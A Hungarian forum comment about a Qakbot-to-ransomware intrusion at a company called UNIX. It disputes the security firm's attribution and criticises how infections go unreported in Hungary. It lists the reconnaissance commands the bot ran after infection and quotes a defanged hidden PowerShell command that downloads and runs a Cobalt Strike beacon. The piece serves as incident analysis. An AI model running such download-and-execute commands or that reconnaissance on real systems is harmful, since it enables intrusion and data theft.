Egy picit OFF:
A unix auto nagyon más volt. Meg ott akiket kihívtak security céget azok háttal ültek a mozinak.
Eleve hogy a secu cég azt mondta a UNIX-nak hogy REvil-Sodinokibi volt aki megtámadta őket már az nem fedi a valóságot. Eleve mert különbséget teszünk hogy ki az aki támad meg ki az akinek a ransomware-jét pusholják ki. És ebben az esetben a Quakbot volt aki megtámadta őket és az Ő 2nd layer proxy serverükhöz csatlakozott vissza a bot aztán később lett powershell-el cobalt strike beacon-jük. De az IT cég aki kiment még a Qbot-ot se találta meg :D .
(Erről nagyon sokat tudnék mesélni de ugye Magyarországon vagyunk, ha bármit is mondasz már ügyvéddel fenyegetnek. Ezért nem is lett jelentve anno hogy meg votlak fertőzve. Ha bejelented akkor jönnek hogy te ezt honnan tudod mit csináltál mihez férsz hozzá stb stb a sok kérdés és fenyegetés. Idehaza jobb ezekből kimaradni és nem jelenteni aztán pedig látni ahogy "elsüllyed". Ez tapasztalat. Itthon eljutottunk arra a szintre hogy ha van is fertőzés nem jelentik külföldi researcherek SEM nem hogy Magyarok. Ez vonatkozik állami rendszerek fertőzésére is, illetve a sok POSTA.hu phishing ahol bankkártya adatokat lopnak el ahol megvan a Marokkói meg Tunéziai meg Lengyel ember otthoni IP-je.)
=====================================================================================================================
És csak hogy ne legyen az hogy én itt "tippelek" meg nem tudom miről beszélek itt van pár log (Nem a UNIX rendszeréből mielőtt valaki nem értette volna az eddigieket amit leírtam):
Ő volt az első fertőzött phishing által (maszkolom a nevét logikus):
W...Viktor; Windows defender; Win 10 PRO.
Fertőzés ideje (unix time): 1611845954
Ezeket a commandokat futtatja le a Qbot mikor bekerült: (Minden fertőzésnél ez az alap)
- route print;
- netstat -nao;
- net localgroup;
- whoami /all;
- set;
- arp -a;
- ipconfig /all;
- net view /all,
- nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.DOMAIN;
- net share;
- route print;
- qwinsta;
Ennek a botnak az egyik pluginje végig gyűjtötte az összes keylogot meg levelezést meg mail címeket, exportálta böngészőben store-olt jelszavakat stb.
Aztán manuálisan pusholják ki a botnak hogy powershellel töltsön le egy filet és futassa (Cobalt strike beacon ami vissza connectel).
Ez így néz ki: "powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hXxp://......'))" (csak base 64 encodeolva)
Logikus a domain admin a cél, aztán onnan minden gépre kiküldik GPO-ban hogy töltsed le azt az exét és futassad. De az exe már nem a Quakbot saját exe-je hanem azt veszik valakitől és X arányban osztoznak azzal akié az exe. Nem tudom ebben az esetben kinek az exe-jét használták. És pontosan tudták mennyi a cég bevétele, azt azonnal kigyűjti egy emberke aki kb csak ezt csinálja nekik 8 órába hogy megnézi ki a ferőzött és mennyi a cég bevétele és commentet tesz hogy érdemes e vele foglalkozni. Ebben az esetben is ez volt.
=====================================================================================================================
Viszont az tökjó hogy a unix közölte a részleteket hogy mi történt! Azért az nagyon korrekt! A CHS sehol sincs ezzel még.